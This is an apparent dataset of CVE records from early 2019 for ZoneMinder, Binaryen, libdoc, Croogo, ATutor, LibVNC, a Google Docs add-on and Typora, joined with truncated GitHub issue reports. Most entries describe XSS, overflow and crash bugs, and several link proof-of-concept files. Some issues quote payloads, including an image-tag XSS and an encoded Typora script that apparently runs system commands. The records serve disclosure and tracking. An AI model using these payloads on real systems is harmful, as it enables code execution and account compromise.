[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/commit/a3e8fd4fd5b579865f35aac3b964bc78d5b7a94a" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Ad...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06", "versionEndExcluding": null, "versionEndIncluding": "1.32.3", "versionStart...
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2444
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
**Describe Your Environment** - ZoneMinder v1.33.1 - Installed from - ppa:iconnor/zoneminder-master **Describe the bug** In the view `zone`, an user can add/view/delete zones. While adding a zone, there exists no input filtration, allowing an attacker to inject unintended values. Later while displaying the zon...
Stored Self-Cross Site Scripting (XSS) - zones.php
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2444/comments
0
2019-01-24T18:48:25Z
2019-01-25T13:15:12Z
https://github.com/ZoneMinder/zoneminder/issues/2444
402,845,981
2,444
74
CVE-2019-6991
2019-01-28T20:29:00.373
A classic Stack-based buffer overflow exists in the zmLoadUser() function in zm_user.cpp of the zmu binary in ZoneMinder through 1.32.3, allowing an unauthenticated attacker to execute code via a long username.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2478" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06", "versionEndExcluding": null, "versionEndIncluding": "1.32.3", "versionStart...
[ "787" ]
787
https://github.com/ZoneMinder/zoneminder/issues/2478
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
**Describe Your Environment** - ZoneMinder v1.33.1 - Installed from - ppa:iconnor/zoneminder-master **Describe the bug** A Stack overflows occur when variable size data is copied into fixed length buffers located on the program stack without any bounds checking. Vulnerabilities of this class are generally cons...
Stack based buffer Overflow - /src/zm_user.cpp (zmu)
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2478/comments
1
2019-01-25T03:16:25Z
2019-01-25T13:48:05Z
https://github.com/ZoneMinder/zoneminder/issues/2478
402,988,560
2,478
75
CVE-2019-6992
2019-01-28T20:29:00.437
A stored-self XSS exists in web/skins/classic/views/controlcaps.php of ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code in a vulnerable field via a long NAME or PROTOCOL to the index.php?view=controlcaps URI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/commit/8c5687ca308e441742725e0aff9075779fa1a498" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Ad...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06", "versionEndExcluding": null, "versionEndIncluding": "1.32.3", "versionStart...
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2445
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
**Describe Your Environment** - ZoneMinder v1.33.1 - Installed from - ppa:iconnor/zoneminder-master **Describe the bug** The view `controlcaps`, displays the `Protocol` field record with no proper filtration, leading to Self - Stored XSS. **To Reproduce** Affected URL : http://localhost/zm/index.php?v...
Stored Self-Cross Site Scripting (XSS) - controlcaps.php
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2445/comments
0
2019-01-24T18:53:08Z
2019-01-25T13:35:10Z
https://github.com/ZoneMinder/zoneminder/issues/2445
402,847,762
2,445
76
CVE-2019-7151
2019-01-29T00:29:00.517
A NULL pointer dereference was discovered in wasm::Module::getFunctionOrNull in wasm/wasm.cpp in Binaryen 1.38.22. A crafted input can cause segmentation faults, leading to denial-of-service, as demonstrated by wasm-opt.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/1881" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*", "matchCriteriaId": "DCFD315B-77AA-49CB-B137-824C51EFD078", "versionEndExcluding": "65", "versionEndIncluding": null, "versionStartExclu...
[ "476" ]
476
https://github.com/WebAssembly/binaryen/issues/1881
[ "Exploit", "Third Party Advisory" ]
github.com
[ "WebAssembly", "binaryen" ]
Hi, there. A Null pointer Deference problem was discovered in wasm::Module::getFunctionOrNull(wasm::Name). A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use "wasm-opt $POC" to reproduce the problem. [POC.zip](https://github.com/...
Null pointer Deference in wasm::Module::getFunctionOrNull(wasm::Name)
https://api.github.com/repos/WebAssembly/binaryen/issues/1881/comments
1
2019-01-20T12:11:54Z
2019-01-20T18:08:15Z
https://github.com/WebAssembly/binaryen/issues/1881
401,091,528
1,881
77
CVE-2019-7152
2019-01-29T00:29:00.563
A heap-based buffer over-read was discovered in wasm::WasmBinaryBuilder::processFunctions() in wasm/wasm-binary.cpp (when calling wasm::WasmBinaryBuilder::getFunctionIndexName) in Binaryen 1.38.22. A crafted input can cause segmentation faults, leading to denial-of-service, as demonstrated by wasm-opt.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/1880" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*", "matchCriteriaId": "DCFD315B-77AA-49CB-B137-824C51EFD078", "versionEndExcluding": "65", "versionEndIncluding": null, "versionStartExclu...
[ "125" ]
125
https://github.com/WebAssembly/binaryen/issues/1880
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "WebAssembly", "binaryen" ]
Hi, there. A Heap-buffer-overflow problem was discovered in WasmBinaryBuilder::getFunctionIndexName(unsigned int). A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use "./wasm-opt $POC" to reproduce the error. [POC.zip](https://git...
A Heap-buffer-overflow problem was discovered in WasmBinaryBuilder::getFunctionIndexName(unsigned int)
https://api.github.com/repos/WebAssembly/binaryen/issues/1880/comments
1
2019-01-20T12:07:15Z
2019-01-20T18:05:01Z
https://github.com/WebAssembly/binaryen/issues/1880
401,091,205
1,880
78
CVE-2019-7153
2019-01-29T00:29:00.597
A NULL pointer dereference was discovered in wasm::WasmBinaryBuilder::processFunctions() in wasm/wasm-binary.cpp (when calling wasm::WasmBinaryBuilder::getFunctionIndexName) in Binaryen 1.38.22. A crafted input can cause segmentation faults, leading to denial-of-service, as demonstrated by wasm-opt.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/1879" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*", "matchCriteriaId": "DCFD315B-77AA-49CB-B137-824C51EFD078", "versionEndExcluding": "65", "versionEndIncluding": null, "versionStartExclu...
[ "476" ]
476
https://github.com/WebAssembly/binaryen/issues/1879
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "WebAssembly", "binaryen" ]
Hi, there. A Null pointer Deference problem was discovered in WasmBinaryBuilder::getFunctionIndexName(unsigned int) in wasm/wasm-binary.cpp. A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use "wasm-opt $POC" to reproduce the probl...
Null pointer Deference in WasmBinaryBuilder::getFunctionIndexName(unsigned int) in wasm/wasm-binary.cpp
https://api.github.com/repos/WebAssembly/binaryen/issues/1879/comments
2
2019-01-20T12:02:25Z
2019-01-24T18:05:45Z
https://github.com/WebAssembly/binaryen/issues/1879
401,090,832
1,879
79
CVE-2019-7154
2019-01-29T00:29:00.627
The main function in tools/wasm2js.cpp in Binaryen 1.38.22 has a heap-based buffer overflow because Emscripten is misused, triggering an error in cashew::JSPrinter::printAst() in emscripten-optimizer/simple_ast.h. A crafted input can cause segmentation faults, leading to denial-of-service, as demonstrated by wasm2js.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/1876" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*", "matchCriteriaId": "DCFD315B-77AA-49CB-B137-824C51EFD078", "versionEndExcluding": "65", "versionEndIncluding": null, "versionStartExclu...
[ "787" ]
787
https://github.com/WebAssembly/binaryen/issues/1876
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "WebAssembly", "binaryen" ]
Hi, there. A Heap-buffer-overflow problem was discovered in cashew::JSPrinter::printAst() function in simple_ast.h in emscripten-optimizer, as distributed in Binaryen 1.38.22. A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use "./...
A Heap-buffer-overflow problem was discovered in cashew::JSPrinter::printAst() function in simple_ast.h
https://api.github.com/repos/WebAssembly/binaryen/issues/1876/comments
0
2019-01-19T07:42:40Z
2019-01-23T01:15:38Z
https://github.com/WebAssembly/binaryen/issues/1876
400,971,559
1,876
80
CVE-2019-7156
2019-01-29T08:29:00.207
In libdoc through 2019-01-28, calcFileBlockOffset in ole.c allows division by zero.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/106813" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/uvoteam/libdoc/issues/5...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libdoc_project:libdoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "0B7CDA2C-09E3-4504-8C5B-1B3B230017E2", "versionEndExcluding": null, "versionEndIncluding": "2019-01-28", "versionS...
[ "369" ]
369
https://github.com/uvoteam/libdoc/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "uvoteam", "libdoc" ]
A crafted input will lead to ’division by zero‘ in ole.c:390 at libdoc master branch(2019/1/29) when using libdoc.a Triggered by ``` gcc main.c -o doc2txt -L ../build/ -lasan -fsanitize=address -ggdb ../build/libdoc.a doc2txt [infile] ``` Poc [libdoc_poc3.zip](https://github.com/uvoteam/libdoc/files/2805885/...
division by zero in ole.c:390 at libdoc master branch(2019/1/29) when using libdoc.a
https://api.github.com/repos/uvoteam/libdoc/issues/5/comments
2
2019-01-29T03:14:13Z
2019-01-31T19:22:58Z
https://github.com/uvoteam/libdoc/issues/5
404,103,525
5
81
CVE-2019-7168
2019-01-29T18:29:00.227
A stored-self XSS exists in Croogo through v3.0.5, allowing an attacker to execute HTML or JavaScript code in a vulnerable Blog field to /admin/nodes/nodes/add/blog.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/croogo/croogo/issues/886" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:croogo:croogo:*:*:*:*:*:*:*:*", "matchCriteriaId": "0F904A91-292D-453E-A6AD-E03ADD824B7D", "versionEndExcluding": null, "versionEndIncluding": "3.0.5", "versionStartExcluding...
[ "79" ]
79
https://github.com/croogo/croogo/issues/886
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "croogo", "croogo" ]
**Description -** There's no escape being done before printing out the value of `Blog` in the Content page. **Croogo version -** v3.0.5 **Steps to reproduce -** - Navigate to http://localhost/croogo/admin/nodes/nodes/add/blog & add the below-shared payload as the Blog field value. Payload - Introduction ...
Stored XSS in "Blog" field - Content
https://api.github.com/repos/croogo/croogo/issues/886/comments
0
2019-01-16T11:58:30Z
2019-08-23T15:40:21Z
https://github.com/croogo/croogo/issues/886
399,776,098
886
82
CVE-2019-7169
2019-01-29T18:29:00.287
A stored-self XSS exists in Croogo through v3.0.5, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/menus/menus/edit/3.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/croogo/croogo/issues/888" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:croogo:croogo:*:*:*:*:*:*:*:*", "matchCriteriaId": "0F904A91-292D-453E-A6AD-E03ADD824B7D", "versionEndExcluding": null, "versionEndIncluding": "3.0.5", "versionStartExcluding...
[ "79" ]
79
https://github.com/croogo/croogo/issues/888
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "croogo", "croogo" ]
**Description -** There's no escape being done before printing out the value of `Title` in the Main Menu page. **croogo version -** v3.0.5 **Steps to reproduce -** - Navigate to http://localhost/croogo/admin/menus/menus/edit/3 & add the below-shared payload as the value to the Title field. Payload -`Main ...
Stored XSS in "Title" field - Main Menu
https://api.github.com/repos/croogo/croogo/issues/888/comments
0
2019-01-16T12:00:04Z
2019-08-23T15:40:21Z
https://github.com/croogo/croogo/issues/888
399,776,697
888
83
CVE-2019-7170
2019-01-29T18:29:00.317
A stored-self XSS exists in Croogo through v3.0.5, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/taxonomy/vocabularies.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/croogo/croogo/issues/890" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:croogo:croogo:*:*:*:*:*:*:*:*", "matchCriteriaId": "0F904A91-292D-453E-A6AD-E03ADD824B7D", "versionEndExcluding": null, "versionEndIncluding": "3.0.5", "versionStartExcluding...
[ "79" ]
79
https://github.com/croogo/croogo/issues/890
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "croogo", "croogo" ]
**Description -** There's no escape being done before printing out the value of `Title` in the Vocabulary page. **croogo version -** v3.0.5 **Steps to reproduce -** - Navigate to http://localhost/croogo/admin/taxonomy/vocabularies/add & add the below-shared payload as the values to the Title field. Payl...
Stored XSS in "Title" field - Vocabulary page
https://api.github.com/repos/croogo/croogo/issues/890/comments
1
2019-01-16T12:01:39Z
2019-08-23T15:40:22Z
https://github.com/croogo/croogo/issues/890
399,777,280
890
84
CVE-2019-7171
2019-01-29T18:29:00.367
A stored-self XSS exists in Croogo through v3.0.5, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/blocks/blocks/edit/8.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/croogo/croogo/issues/887" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:croogo:croogo:*:*:*:*:*:*:*:*", "matchCriteriaId": "0F904A91-292D-453E-A6AD-E03ADD824B7D", "versionEndExcluding": null, "versionEndIncluding": "3.0.5", "versionStartExcluding...
[ "79" ]
79
https://github.com/croogo/croogo/issues/887
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "croogo", "croogo" ]
**Description -** There's no escape being done before printing out the value of `Title` in the Blocks page. **croogo version -** v3.0.5 **Steps to reproduce -** - Navigate to http://localhost/croogo/admin/blocks/blocks/edit/8 & add the below-shared payload as the Title field value. Payload -`<img src=xss ...
Stored XSS in "Title" field - Blocks
https://api.github.com/repos/croogo/croogo/issues/887/comments
0
2019-01-16T11:59:19Z
2019-08-23T15:40:21Z
https://github.com/croogo/croogo/issues/887
399,776,411
887
85
CVE-2019-7172
2019-01-29T18:29:00.413
A stored-self XSS exists in ATutor through v2.2.4, allowing an attacker to execute HTML or JavaScript code in a vulnerable Real Name field to /mods/_core/users/admins/my_edit.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/atutor/ATutor/issues/164" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.co...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:atutor:atutor:*:*:*:*:*:*:*:*", "matchCriteriaId": "7DAE444F-3475-41BE-AB95-1EDBA4B9604F", "versionEndExcluding": null, "versionEndIncluding": "2.2.4", "versionStartExcluding...
[ "79" ]
79
https://github.com/atutor/ATutor/issues/164
[ "Exploit", "Third Party Advisory" ]
github.com
[ "atutor", "ATutor" ]
**Description -** There's no escape being done before printing out the value of `Real Name` in the My Account page. **ATutor version -** v2.2.4 **Steps to reproduce -** - Navigate to http://localhost/atutor/mods/_core/users/admins/my_edit.php & add the below-shared payload as the value to the Real Name field....
Stored XSS in "Real Name" field - My Account
https://api.github.com/repos/atutor/ATutor/issues/164/comments
4
2019-01-16T11:55:48Z
2019-09-09T18:09:18Z
https://github.com/atutor/ATutor/issues/164
399,775,140
164
86
CVE-2019-7173
2019-01-29T18:29:00.460
A stored-self XSS exists in Croogo through v3.0.5, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/file-manager/attachments/edit/4.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/croogo/croogo/issues/889" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:croogo:croogo:*:*:*:*:*:*:*:*", "matchCriteriaId": "0F904A91-292D-453E-A6AD-E03ADD824B7D", "versionEndExcluding": null, "versionEndIncluding": "3.0.5", "versionStartExcluding...
[ "79" ]
79
https://github.com/croogo/croogo/issues/889
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "croogo", "croogo" ]
**Description -** There's no escape being done before printing out the value of `Title` in the Attachment page. **Croogo version -** v3.0.5 **Steps to reproduce -** - Navigate to http://localhost/croogo/admin/file-manager/attachments/edit/4 & add the below-shared payload as the value to the Title field. ...
Stored XSS in "Title" field - Attachment page
https://api.github.com/repos/croogo/croogo/issues/889/comments
0
2019-01-16T12:01:11Z
2019-08-23T15:40:22Z
https://github.com/croogo/croogo/issues/889
399,777,117
889
87
CVE-2018-20748
2019-01-30T18:29:00.257
LibVNC before 0.9.12 contains multiple heap out-of-bounds write vulnerabilities in libvncclient/rfbproto.c. The fix for CVE-2018-20019 was incomplete.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-390195.pdf" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibVNC...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libvnc_project:libvncserver:*:*:*:*:*:*:*:*", "matchCriteriaId": "DEF1BF44-78B8-44E3-9A5A-29AB8111322B", "versionEndExcluding": "0.9.12", "versionEndIncluding": null, "versio...
[ "787" ]
787
https://github.com/LibVNC/libvncserver/issues/273
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibVNC", "libvncserver" ]
The fixes for #247 are incomplete, as I explained in: https://www.openwall.com/lists/oss-security/2018/12/10/8 "Upstream's fix appears to be to add casts to (uint64_t) before adding 1 in those many malloc() calls. On platforms with larger than 32-bit size_t, this should be sufficient against integer overflows si...
SECURITY: malloc((uint64_t)length + 1) is unsafe, especially on 32-bit systems
https://api.github.com/repos/LibVNC/libvncserver/issues/273/comments
9
2018-12-13T10:37:17Z
2019-01-30T17:46:52Z
https://github.com/LibVNC/libvncserver/issues/273
390,616,835
273
88
CVE-2019-7233
2019-01-30T21:29:00.333
In libdoc through 2019-01-28, doc2text in catdoc.c has a NULL pointer dereference.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/uvoteam/libdoc/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libdoc_project:libdoc:20190128:*:*:*:*:*:*:*", "matchCriteriaId": "1E03929A-0770-4058-B4DD-423FA3FA94DC", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "476" ]
476
https://github.com/uvoteam/libdoc/issues/6
[ "Exploit", "Third Party Advisory" ]
github.com
[ "uvoteam", "libdoc" ]
A parameter which do not exist will lead to Segmentation fault in catdoc.c:34 at libdoc master branch(2019/1/29) when using libdoc.a Triggered by ``` gcc main.c -o doc2txt -L ../build/ -lasan -fsanitize=address -ggdb ../build/libdoc.a doc2txt [A filename which not exist] ``` Poc ./doc2txt d_000094,sig_06,src_...
Segmentation fault in catdoc.c:34 at libdoc master branch(2019/1/29) when using libdoc.a
https://api.github.com/repos/uvoteam/libdoc/issues/6/comments
1
2019-01-30T01:57:15Z
2019-01-31T18:41:44Z
https://github.com/uvoteam/libdoc/issues/6
404,567,164
6
89
CVE-2019-7250
2019-01-31T09:29:00.673
An issue was discovered in the Cross Reference Add-on 36 for Google Docs. Stored XSS in the preview boxes in the configuration panel may allow a malicious user to use both label text and references text to inject arbitrary JavaScript code (via SCRIPT elements, event handlers, etc.). Since this code is stored by the plu...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/davidrthorn/cross_reference/issues/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cross_reference_project:cross_reference:36:*:*:*:*:google_docs:*:*", "matchCriteriaId": "06E1B2BE-ECCD-4677-8DC9-3A6A4575BF47", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "79" ]
79
https://github.com/davidrthorn/cross_reference/issues/32
[ "Exploit", "Third Party Advisory" ]
github.com
[ "davidrthorn", "cross_reference" ]
### Overall description A stored XSS vulnerability in the preview boxes in the configuration panel may allow a malicious user to use both label text and references text to inject arbitrary javascript code (via script tags, event handlers, etc.). Since the code is stored by the plugin, the attacker may be able to targ...
Stored XSS vulnerability in preview boxes via label and references text
https://api.github.com/repos/davidrthorn/cross_reference/issues/32/comments
2
2019-01-30T16:04:38Z
2020-04-29T07:39:25Z
https://github.com/davidrthorn/cross_reference/issues/32
404,842,377
32
90
CVE-2019-7295
2019-01-31T21:29:00.347
typora through 0.9.63 has XSS, with resultant remote command execution, during block rendering of a mathematical formula.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/typora/typora-issues/issues/2129" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Th...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typora:typora:*:*:*:*:*:*:*:*", "matchCriteriaId": "B8ABDC3C-2AC4-46A7-AA26-B645B85B426F", "versionEndExcluding": null, "versionEndIncluding": "0.9.63", "versionStartExcludin...
[ "79" ]
79
https://github.com/typora/typora-issues/issues/2129
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "typora", "typora-issues" ]
When open the document with the following content,it will **execute commands**. The **Linux,Windows** and **Mac** version between **0.9.60~0.9.63** are all affected. Here is a poc on windows: ```markdown $$ </script><iframe src=javascript:eval(atob('dmFyIFByb2Nlc3MgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmJpbmR...
A XSS with resultant remote command execution when Typora rendering Mathematical formula
https://api.github.com/repos/typora/typora-issues/issues/2129/comments
3
2019-01-25T16:06:05Z
2019-02-02T05:07:36Z
https://github.com/typora/typora-issues/issues/2129
403,220,681
2,129
91
CVE-2019-7296
2019-01-31T21:29:00.397
typora through 0.9.64 has XSS, with resultant remote command execution, during inline rendering of a mathematical formula.
